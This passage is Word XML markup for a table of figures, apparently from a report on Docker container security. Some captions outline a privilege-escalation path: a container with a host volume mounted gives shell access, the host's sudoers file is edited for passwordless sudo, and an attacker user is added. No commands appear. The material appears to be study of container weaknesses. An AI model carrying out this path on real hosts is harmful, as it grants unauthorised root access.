          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858616" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 25: run the Docker image.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858616 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46B4ADB4" w14:textId="65B35E09" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858617" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 26: A container with volume mounted, giving shell access.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858617 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C78AC02" w14:textId="5077F650" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858618" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 27: access to the host’s sudoers file system.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858618 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C6B857E" w14:textId="6E6DBF12" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858619" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 28: appending the syntax to run sudo commands without password.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858619 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23ED1887" w14:textId="4F4C2378" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858620" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 29: the attacker user is added to the sudoers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858620 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59D2C025" w14:textId="31E4C733" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858621" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 30: Dockerfile for OpenSSH-server with SSH port exposed.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858621 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="052221C3" w14:textId="739A5459" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858622" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 31:Dockerfile with no SSH port exposed.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858622 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0975F2E9" w14:textId="071B7AEA" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858623" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 32: image created for the SSH enabled application.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858623 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CF4898C" w14:textId="7BA3B253" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858624" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 33: Docker image created for the NON-SSH application.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858624 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C4D7C7B" w14:textId="6D72BC82" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858625" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 34: launching the two containers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858625 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63AD2C22" w14:textId="46E943C8" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858626" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 35: Alpine container with access to the shell.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858626 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05831010" w14:textId="0900C984" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858627" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 36: testing and checking the containers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858627 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="100BE505" w14:textId="282421B7" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858628" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 37: output of Docker network inspect bridge.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858628 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="335DB4ED" w14:textId="77E13D2C" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858629" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 38: port published to the host.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858629 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CF2C636" w14:textId="73C4753E" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858630" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 39: ssh into the con_ssh via the forwarded port.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858630 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78AABE7C" w14:textId="0A1BABA5" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858631" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 40: host ssh to the con_nossh container.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858631 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
